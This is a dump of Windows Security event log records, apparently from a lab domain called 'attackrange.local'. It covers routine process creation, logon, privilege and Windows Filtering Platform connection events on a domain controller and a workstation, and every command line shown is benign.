LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887132
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x187c
New Process Name: C:\Windows\servicing\TrustedInstaller.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x268
Creator Process Name: C:\Windows\System32\services.exe
Process Command Line: C:\Windows\servicing\TrustedInstaller.exe
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=887131
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Privileges: SeAssignPrimaryTokenPrivilege
SeTcbPrivilege
SeSecurityPrivilege
SeTakeOwnershipPrivilege
SeLoadDriverPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeDebugPrivilege
SeAuditPrivilege
SeSystemEnvironmentPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
04/19/2021 06:27:43 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=887130
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: NT AUTHORITY\SYSTEM
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x268
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:44 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887207
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: 127.0.0.1
Source Port: 63912
Destination Address: 127.0.0.1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:44 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887206
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 127.0.0.1
Source Port: 63912
Destination Address: 127.0.0.1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65789
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:44 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887205
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 53797
Destination Address: 10.0.0.2
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:44 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887204
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 2912
Application Name: \device\harddiskvolume1\windows\system32\dns.exe
Network Information:
Direction: Inbound
Source Address: ::1
Source Port: 63912
Destination Address: ::1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65786
Layer Name: Receive/Accept
Layer Run-Time ID: 46
04/19/2021 06:27:44 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887203
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: ::1
Source Port: 63912
Destination Address: ::1
Destination Port: 53
Protocol: 17
Filter Information:
Filter Run-Time ID: 65788
Layer Name: Connect
Layer Run-Time ID: 50
04/19/2021 06:27:44 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887202
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 63912
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 38
04/19/2021 06:27:44 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887201
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1028
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: ::
Source Port: 63912
Protocol: 17
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:44 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887200
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Inbound
Source Address: 10.0.1.14
Source Port: 137
Destination Address: 10.0.1.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:44 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887199
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 137
Destination Address: 169.254.255.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:44 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887198
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 137
Destination Address: 169.254.255.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:44 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887197
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1265
Destination Address: 10.0.1.12
Destination Port: 8000
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:44 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887196
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 4116
Application Name: \device\harddiskvolume1\program files\splunkuniversalforwarder\etc\apps\splunk_ta_stream\windows_x86_64\bin\streamfwd.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1265
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:45 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=887216
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x11bc
Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Exit Status: 0x1
04/19/2021 06:27:45 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887215
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 0.0.0.0
Source Port: 68
Destination Address: 255.255.255.255
Destination Port: 67
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:45 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887214
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 0.0.0.0
Source Port: 68
Destination Address: 255.255.255.255
Destination Port: 67
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:45 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887213
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Outbound
Source Address: 10.0.1.14
Source Port: 1266
Destination Address: 40.70.224.147
Destination Port: 443
Protocol: 6
Filter Information:
Filter Run-Time ID: 69906
Layer Name: Connect
Layer Run-Time ID: 48
04/19/2021 06:27:45 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5158
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887212
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a bind to a local port.
Application Information:
Process ID: 1304
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Source Address: 0.0.0.0
Source Port: 1266
Protocol: 6
Filter Information:
Filter Run-Time ID: 0
Layer Name: Resource Assignment
Layer Run-Time ID: 36
04/19/2021 06:27:45 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=887211
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-DC-982$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x11bc
New Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1034
Creator Process Name: C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe
Process Command Line: "C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:45 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887210
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Inbound
Source Address: 10.0.1.14
Source Port: 137
Destination Address: 10.0.1.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:45 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887209
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 92
Application Name: \device\harddiskvolume1\windows\system32\svchost.exe
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 137
Destination Address: 169.254.255.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:45 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=win-dc-982.attackrange.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=887208
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.
Application Information:
Process ID: 4
Application Name: System
Network Information:
Direction: Inbound
Source Address: 169.254.79.158
Source Port: 137
Destination Address: 169.254.255.255
Destination Port: 137
Protocol: 17
Filter Information:
Filter Run-Time ID: 65787
Layer Name: Receive/Accept
Layer Run-Time ID: 44
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278833
Keywords=Audit Success
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: NT Local Security Authority / Authentication Service
Service Name: LsaRegisterLogonProcess()
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278832
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E4
Process Information:
New Process ID: 0x1db8
New Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x2d4
Creator Process Name: C:\Windows\System32\svchost.exe
Process Command Line: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278831
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0xBD64BF
Process Information:
New Process ID: 0x185c
New Process Name: C:\Windows\System32\dwm.exe
Token Elevation Type: %%1938
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xe78
Creator Process Name: C:\Windows\System32\winlogon.exe
Process Command Line: "dwm.exe"
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=278830
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0xBD64BF
Privileges: SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4672
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Special Logon
OpCode=Info
RecordNumber=278829
Keywords=Audit Success
Message=Special privileges assigned to new logon.
Subject:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0xBD6480
Privileges: SeAssignPrimaryTokenPrivilege
SeAuditPrivilege
SeImpersonatePrivilege
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=278828
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Logon Information:
Logon Type: 2
Restricted Admin Mode: -
Virtual Account: Yes
Elevated Token: No
Impersonation Level: Impersonation
New Logon:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0xBD64BF
Linked Logon ID: 0xBD6480
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0xe78
Process Name: C:\Windows\System32\winlogon.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=278827
Keywords=Audit Success
Message=An account was successfully logged on.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Logon Information:
Logon Type: 2
Restricted Admin Mode: -
Virtual Account: Yes
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: Window Manager\DWM-3
Account Name: DWM-3
Account Domain: Window Manager
Logon ID: 0xBD6480
Linked Logon ID: 0xBD64BF
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0xe78
Process Name: C:\Windows\System32\winlogon.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4648
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Logon
OpCode=Info
RecordNumber=278826
Keywords=Audit Success
Message=A logon was attempted using explicit credentials.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Logon GUID: {00000000-0000-0000-0000-000000000000}
Account Whose Credentials Were Used:
Account Name: DWM-3
Account Domain: Window Manager
Logon GUID: {00000000-0000-0000-0000-000000000000}
Target Server:
Target Server Name: localhost
Additional Information: localhost
Process Information:
Process ID: 0xe78
Process Name: C:\Windows\System32\winlogon.exe
Network Information:
Network Address: -
Port: -
This event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials. This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4673
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Sensitive Privilege Use
OpCode=Info
RecordNumber=278825
Keywords=Audit Success
Message=A privileged service was called.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Service:
Server: NT Local Security Authority / Authentication Service
Service Name: LsaRegisterLogonProcess()
Process:
Process ID: 0x274
Process Name: C:\Windows\System32\lsass.exe
Service Request Information:
Privileges: SeTcbPrivilege
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278824
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0x1184
New Process Name: C:\Windows\System32\LogonUI.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0xe78
Creator Process Name: C:\Windows\System32\winlogon.exe
Process Command Line: "LogonUI.exe" /flags:0x2 /state0:0xa39db855 /state1:0x41c64e6d
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
Type 1 is a full token with no privileges removed or groups disabled. A full token is only used if User Account Control is disabled or if the user is the built-in Administrator account or a service account.
Type 2 is an elevated token with no privileges removed or groups disabled. An elevated token is used when User Account Control is enabled and the user chooses to start the program using Run as administrator. An elevated token is also used when an application is configured to always require administrative privilege or to always require maximum privilege, and the user is a member of the Administrators group.
Type 3 is a limited token with administrative privileges removed and administrative groups disabled. The limited token is used when User Account Control is enabled, the application does not require administrative privilege, and the user does not choose to start the program using Run as administrator.
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4689
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Termination
OpCode=Info
RecordNumber=278823
Keywords=Audit Success
Message=A process has exited.
Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Process Information:
Process ID: 0x1b14
Process Name: C:\Windows\System32\smss.exe
Exit Status: 0x0
04/19/2021 06:27:46 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=win-host-5.attackrange.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=278822
Keywords=Audit Success
Message=A new process has been created.
Creator Subject:
Security ID: NT AUTHORITY\SYSTEM
Account Name: WIN-HOST-5$
Account Domain: ATTACKRANGE
Logon ID: 0x3E7
Target Subject:
Security ID: NULL SID
Account Name: -
Account Domain: -
Logon ID: 0x0
Process Information:
New Process ID: 0xe78
New Process Name: C:\Windows\System32\winlogon.exe
Token Elevation Type: %%1936
Mandatory Label: Mandatory Label\System Mandatory Level
Creator Process ID: 0x1b14
Creator Process Name: C:\Windows\System32\smss.exe
Process Command Line: winlogon.exe
Token Elevation Type indicates the type of token that was assigned to the new process in accordance with User Account Control policy.
